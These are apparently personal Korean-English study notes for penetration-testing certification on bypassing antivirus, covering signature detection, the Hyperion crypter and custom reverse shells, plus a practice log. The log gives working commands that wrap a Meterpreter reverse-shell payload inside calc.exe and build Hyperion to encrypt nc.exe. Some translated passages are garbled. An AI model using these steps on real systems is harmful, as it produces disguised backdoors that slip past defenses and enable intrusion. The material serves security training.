17. Bypassing Antivirus Software

17.1 - Encoding Payloads with Metasploit

 

안티백신은 블랙리스트 기술로 여겨진다.
악성코드의 알려진 시그니처가 파일시스템에서 검색되고 만약 발견되면 격리된다.
그러므로 적절한 도구를 사용하면 백신을 우회하는 것은 상대적으로 쉽다.
그 과정은 알려진 악성 파일의 바이너리 구조를 바꾸기 위하여 내용을 암호화 하거나 변경하는 것을 수반한다.
그렇게 함으로써 악성파일로 알려진 시그니처는 더이상 관련이 없게되고
새로운 파일 구조는 백신이 이 파일을 무시하게 함으로써 속일 수 있을지도 모른다.
테스트되는 백신이 백신의 수량과 타입에 따르면, 때때로 백신우회가 달성될 수 있다.

단순히 여러가지 무해한 문자열을 변경함으로써 바이너리 파일안에 있는 대문자부터 소문자까지

 

As different antivirus software vendors use different signatures and technologies to detect malware and keep updating their databases on an hourly basis, it’s usually hard to come up with an ultimate solution for antivirus avoidance and quite often the process is based on trial and error in a test environment.

 

바이러스 백신 소프트웨어 공급 업체마다 다른 서명을 사용하므로 맬웨어를 탐지하고 한 시간마다 데이터베이스를 업데이트하는 기술을 사용하는 경우 일반적으로 백신 우회를 위한 궁극적인 솔루션을 마련하기가 어렵고 프로세스는 종종 테스트 환경의 시행 착오를 기반으로합니다.

 

이러한 이유로, 존재, 타입, 백신의 버전 또는 유사한 소프트웨어가 식별되어야 합니다. 타겟머신에 파일을 업로드하기 전에. 만약 백신이 발견되면 그것과 관련하여 가능한 많이 정보를 수집하는 것이 현명합니다. 그리고 타겟 머신에 업로드하기를 바라는 어떤 파일이든 간에 테스트해라 실험 환경안에서. 백신 시그니처를 회피하는 과정은 바이너리 파일을 수작업으로 변경함으로써/ 요구한다. PE파일 구조에 대한 깊은 이해와 어셈블리 프로그래밍을 / 그러므로 이 모듈의 범위를 벗어난다.

 

However, we have several tools available to us in Kali Linux that can help us get by antivirus software.

 

그러나 우리는 칼리에서 이용가능한 여러가지 도구를 가지고 있씁니다. 백신을 지나가는데 도움을 주는
이러한 도구들을 살펴보고 그것들의 효과를 테스트하자 / 다양한 백신회사들을 비교하여

 

 

17.2 - Crypting Known Malware with Software Protectors

 

Software protection tools / are most commonly used to obfuscate and license binaries/ by software vendors / in an attempt to prevent reverse engineering attempts / by software pirates.

 

소프트웨어 보호 도구는 소프트웨어 해적의 역 엔지니어링 시도를 방지하기 위해 소프트웨어 공급 업체가 바이너리를 난독화하고 라이센스를 부여하는 데 가장 일반적으로 사용됩니다.

 

이와 같은 도구들은 효과적입니다. 악성코드 난독화에 그리고 도움을 줍니다.
백신 탐지를 피하도록. 그러한 오픈소스 crypter중 하나, Hyperion이라 불리는 것은 Kali에 존재합니다. 이 crpyter가 우리의 총 AV탐지율에 어느정도 영향을 줄지 봅시다.

 

우리는 컴파일 할 것이고 사용할 것입니다. Hyperion을 우리의 최적화한 페이로드로 암호화 하기 위해 / 여기 포인트에 달려 있습니다.

 

...코드들(생략)....

 

Hyperon 크립트된 페이로드는 훨씬 우수합니다.

 

46개중 14개의 AV회사가 탐지했습니다. 흥미롭게도 이 페이로드는 또한 탐지 되지 않았습니다. 흔히 아는 대부분의 AV회사에

17.3 - Using Custom/Uncommon Tools and Payloads

 

가장 확실한(the most foolproof) 방법은, 백신 보호를 우회하기 위해, 도구들을 사용하고 AV회사에 알려지지 않은 바이너리를 사용합니다. 당신에 의해 작성되거나 독특한 페이로드를 사용하는 것을 발견함으로써.
예를 들면, 다음에 따르는 C 리버스 쉘코드 스니펫은 구글 검색에 의해 발견되었습니다.

이 코드는 에스토닉하고 아마도 흔히 사용되지 않습니다.
그러므로 좋은 기회입니다. 대부분의 AV회사가 그것의 시그니처를 가지고 있지 않아서 / 그것을 컴파일 했을 때

이 이론을 테스트하여 우리가 올다는 것을 증명할 수 있다.

우리는 AV사 46개중 1개가 탐지가 되는 것을 본다. 앞에서 언급한 것처럼 AV탐지는 역동적인 분야이며, 몇달 후 좀 더 많은 AV회사들이 탐지 할지도 모른다. 위 코드에 의해 생성된 바이너리를; 그러나 AV탐지 원리는 거의 변하지 않는다.

 

 

 

2020/07/18  Embeded, Encrypting 실습

두 방법을 실습해본 결과, 현재 윈도우10 방화벽에서는 차단되고 있다.

하지만 시험랩은 레거시 시스템이라 통할 것이다. ㅋ

 

Embed in non-malicious file

-i: 인코드 횟수

-x: 임베디드 시킬 바이너리 파일

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=5555 -f exe -e
x86/shikata_ga_nai -i 9 -x calc.exe -o
bad_calc.exe

Encrypting the malware

wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-1.2.zip
unzip Hyperion-1.2.zip
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe

cp -p /usr/lib/gcc/i686-w64-mingw32/7.3-win32/libgcc_s_sjlj-1.dll .
cp -p /usr/lib/gcc/i686-w64-mingw32/7.3-win32/libstdc++-6.dll .

wine hyperion.exe /tools/shell/nc.exe nc_hyp.exe

In Kali you have hyperion 1 included. However for it to work you have to run it from it's correct path.

So go to /usr/share/veil-evasion/tools/hyperion

And run it like this

wine hyperion /path/to/file.exe encryptedfile.exe

 

 

https://sushant747.gitbooks.io/total-oscp-guide/bypassing_antivirus.html